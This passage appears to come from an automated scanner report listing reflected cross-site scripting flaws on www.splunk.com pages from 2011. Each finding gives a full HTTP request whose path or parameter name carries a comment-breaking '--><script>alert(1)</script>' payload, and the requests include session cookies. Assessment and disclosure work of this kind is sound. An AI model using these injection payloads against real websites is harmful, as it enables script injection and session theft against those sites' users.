Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewb0e48--><script>alert(1)</script>ca595a7ca02/SP-CAAAAAG HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload bfc82--><script>alert(1)</script>ef1ecd35f25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAGbfc82--><script>alert(1)</script>ef1ecd35f25 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.501. http://www.splunk.com/view/SP-CAAAAAG [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/SP-CAAAAAG
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a93ad--><script>alert(1)</script>13cec529721 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAG?a93ad--><script>alert(1)</script>13cec529721=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload fa2b1--><script>alert(1)</script>7698b7372f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewfa2b1--><script>alert(1)</script>7698b7372f0/SP-CAAAAAH HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload a370e--><script>alert(1)</script>b0dcdc76c36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAHa370e--><script>alert(1)</script>b0dcdc76c36 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.504. http://www.splunk.com/view/SP-CAAAAAH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/SP-CAAAAAH
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload dd3b3--><script>alert(1)</script>8573955893e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAAH?dd3b3--><script>alert(1)</script>8573955893e=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:48 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e8b86--><script>alert(1)</script>872651a0663 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewe8b86--><script>alert(1)</script>872651a0663/SP-CAAAAH7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload f468c--><script>alert(1)</script>f6bc10e4ece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAH7f468c--><script>alert(1)</script>f6bc10e4ece HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.507. http://www.splunk.com/view/SP-CAAAAH7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/SP-CAAAAH7
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 71f46--><script>alert(1)</script>f41aad1bdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAAH7?71f46--><script>alert(1)</script>f41aad1bdad=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:17 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28354
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5fc15--><script>alert(1)</script>3127cb5f6e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view5fc15--><script>alert(1)</script>3127cb5f6e4/SP-CAAAFVN HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:18 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 04eef258084ce5cbd78231d4af91d6ed1297008198 Last-Modified: Sun, 06 Feb 2011 16:03:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4c29e--><script>alert(1)</script>2184c2ad3e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAFVN4c29e--><script>alert(1)</script>2184c2ad3e7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e4169140df5ae01ba7c7214b1be920fa1297008222 Last-Modified: Sun, 06 Feb 2011 16:03:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.510. http://www.splunk.com/view/SP-CAAAFVN [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/SP-CAAAFVN
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3aa7--><script>alert(1)</script>5f91d4c2cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/SP-CAAAFVN?b3aa7--><script>alert(1)</script>5f91d4c2cc1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:02:54 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 55246895ba1ccb4925502c124dd90acd1297008174 Last-Modified: Sun, 06 Feb 2011 16:02:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37938
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c2db0--><script>alert(1)</script>5fa0ec96c9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
